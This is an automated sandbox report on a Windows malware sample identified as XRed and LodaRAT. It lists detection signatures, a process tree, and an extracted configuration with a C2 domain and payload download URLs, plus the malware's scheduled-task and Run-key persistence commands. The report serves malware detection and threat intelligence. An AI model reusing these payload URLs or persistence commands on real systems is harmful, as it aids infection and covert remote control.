Windows Analysis Report
222.exe

Overview

General Information

Sample name: 222.exe
Analysis ID: 1582332
MD5: 71386f37f17778126296ca734975db6d
SHA1: 353818dcd74d06565fc0e8ac4416e594d29ecd0b
SHA256: c1317da0fd0dc3d73b38634ea586016f6f651f52acc576fbae8b82721c83e9ae
Tags: exeknkbkk212user-JAMESWT_MHT

Detection

LodaRAT, XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • 222.exe (PID: 4616 cmdline: "C:\Users\user\Desktop\222.exe" MD5: 71386F37F17778126296CA734975DB6D)
    • ._cache_222.exe (PID: 6036 cmdline: "C:\Users\user\Desktop\._cache_222.exe" MD5: 36F4C5372C6391F782C2DB490081746F)
      • cmd.exe (PID: 4668 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 1732 cmdline: schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 6048 cmdline: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 6192 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
      • WerFault.exe (PID: 8444 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 10496 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 6764 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • EWZJGF.exe (PID: 2148 cmdline: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe MD5: 36F4C5372C6391F782C2DB490081746F)
  • EWZJGF.exe (PID: 7380 cmdline: "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe" MD5: 36F4C5372C6391F782C2DB490081746F)
  • Synaptics.exe (PID: 7908 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • EWZJGF.exe (PID: 7460 cmdline: "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe" MD5: 36F4C5372C6391F782C2DB490081746F)
  • EWZJGF.exe (PID: 5060 cmdline: "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe" MD5: 36F4C5372C6391F782C2DB490081746F)
  • EWZJGF.exe (PID: 8588 cmdline: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe MD5: 36F4C5372C6391F782C2DB490081746F)
  • cleanup
Name: Loda, LodaRAT
Description: Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source, Rule, Description, Author, Strings
222.exe, JoeSecurity_XRed, Yara detected XRed, Joe Security
222.exe, JoeSecurity_DelphiSystemParamCount, Detected Delphi use of System.ParamCount(), Joe Security

Source, Rule, Description, Author, Strings
C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, JoeSecurity_ProcessChecker, Yara detected ProcessChecker, Joe Security
C:\ProgramData\Synaptics\RCX6FEC.tmp, JoeSecurity_XRed, Yara detected XRed, Joe Security
C:\ProgramData\Synaptics\RCX6FEC.tmp, JoeSecurity_DelphiSystemParamCount, Detected Delphi use of System.ParamCount(), Joe Security
C:\Users\user\Documents\EEGWXUHVUG\~$cache1, JoeSecurity_XRed, Yara detected XRed, Joe Security
C:\Users\user\Documents\EEGWXUHVUG\~$cache1, JoeSecurity_DelphiSystemParamCount, Detected Delphi use of System.ParamCount(), Joe Security

Source, Rule, Description, Author, Strings
00000007.00000002.3263095777.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, JoeSecurity_ProcessChecker, Yara detected ProcessChecker, Joe Security
00000007.00000002.3264154997.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, JoeSecurity_ProcessChecker, Yara detected ProcessChecker, Joe Security
00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, JoeSecurity_XRed, Yara detected XRed, Joe Security
00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, JoeSecurity_DelphiSystemParamCount, Detected Delphi use of System.ParamCount(), Joe Security
00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, JoeSecurity_XRed, Yara detected XRed, Joe Security

Source, Rule, Description, Author, Strings
0.0.222.exe.400000.0.unpack, JoeSecurity_XRed, Yara detected XRed, Joe Security
0.0.222.exe.400000.0.unpack, JoeSecurity_DelphiSystemParamCount, Detected Delphi use of System.ParamCount(), Joe Security

                              System Summary

Source: Network Connection, Author: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_222.exe, Initiated: true, ProcessId: 6036, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49733
Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_222.exe" , ParentImage: C:\Users\user\Desktop\._cache_222.exe, ParentProcessId: 6036, ParentProcessName: ._cache_222.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, ProcessId: 6048, ProcessName: wscript.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_222.exe" , ParentImage: C:\Users\user\Desktop\._cache_222.exe, ParentProcessId: 6036, ParentProcessName: ._cache_222.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, ProcessId: 6048, ProcessName: wscript.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_222.exe" , ParentImage: C:\Users\user\Desktop\._cache_222.exe, ParentProcessId: 6036, ParentProcessName: ._cache_222.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, ProcessId: 6048, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_222.exe, ProcessId: 6036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HBMQLS
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_222.exe, ProcessId: 6036, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HBMQLS.lnk
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1, CommandLine: schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4668, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1, ProcessId: 1732, ProcessName: schtasks.exe
Source: Process started, Author: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_222.exe" , ParentImage: C:\Users\user\Desktop\._cache_222.exe, ParentProcessId: 6036, ParentProcessName: ._cache_222.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, ProcessId: 6048, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\222.exe, ProcessId: 4616, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 6192, TargetFilename: C:\Users\user\AppData\Local\Temp\XJVR1Oh1.xlsm
Timestamp, SID, Severity, Classtype, Source IP, Source Port, Destination IP, Destination Port, Protocol
2024-12-30T11:23:08.462207+0100, 2822116, 1, Malware Command and Control Activity Detected, 192.168.2.5, 49733, 172.111.138.100, 5552, TCP
2024-12-30T11:23:53.696742+0100, 2822116, 1, Malware Command and Control Activity Detected, 192.168.2.5, 50122, 172.111.138.100, 5552, TCP
2024-12-30T11:24:44.315371+0100, 2822116, 1, Malware Command and Control Activity Detected, 192.168.2.5, 50192, 172.111.138.100, 5552, TCP

Timestamp, SID, Severity, Classtype, Source IP, Source Port, Destination IP, Destination Port, Protocol
2024-12-30T11:23:05.801070+0100, 2832617, 1, Malware Command and Control Activity Detected, 192.168.2.5, 49712, 69.42.215.252, 80, TCP

                              AV Detection

Source: 222.exe, Avira: detected
Source: http://xred.site50.net/syn/SSLLibrary.dlp, Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.iniH)O, Avira URL Cloud: Label: malware
Source: C:\ProgramData\Synaptics\Synaptics.exe, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\ProgramData\Synaptics\RCX6FEC.tmp, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX6FEC.tmp, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: 222.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCX6FEC.tmp, ReversingLabs: Detection: 91%
Source: C:\ProgramData\Synaptics\Synaptics.exe, ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\._cache_222.exe, ReversingLabs: Detection: 55%
Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, ReversingLabs: Detection: 91%
Source: 222.exe, Virustotal: Detection: 85%
Source: 222.exe, ReversingLabs: Detection: 92%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 93.9% probability
Source: C:\Users\user\Desktop\._cache_222.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCX6FEC.tmp, Joe Sandbox ML: detected
Source: 222.exe, Joe Sandbox ML: detected
Source: 222.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49709 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49710 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49716 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49717 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49722 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49726 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49728 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49742 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49744 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49745 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49747 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49752 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49754 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49759 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49766 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49765 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49772 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49835 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49836 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49849 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49850 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49860 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49861 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49885 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49886 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49899 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49924 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49925 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49930 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49931 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49938 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49940 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49951 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49960 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49966 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49972 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49974 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49983 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49984 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50002 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50004 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50026 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50028 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50045 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:50047 version: TLS 1.2
                              Source: 222.exe, 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: 222.exe, 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: 222.exeBinary or memory string: [autorun]
                              Source: 222.exeBinary or memory string: autorun.inf
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: autorun.inf
                              Source: RCX6FEC.tmp.0.drBinary or memory string: [autorun]
                              Source: RCX6FEC.tmp.0.drBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_0077DD92
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_007B2044
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_007B219F
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_007B24A9
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_007A6B3F
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_007A6E4A
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_007AF350
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AFD47 FindFirstFileW,FindClose,2_2_007AFD47
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_007AFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00492044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00492044
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0049219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_0049219F
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_004924A9
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00486B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00486B3F
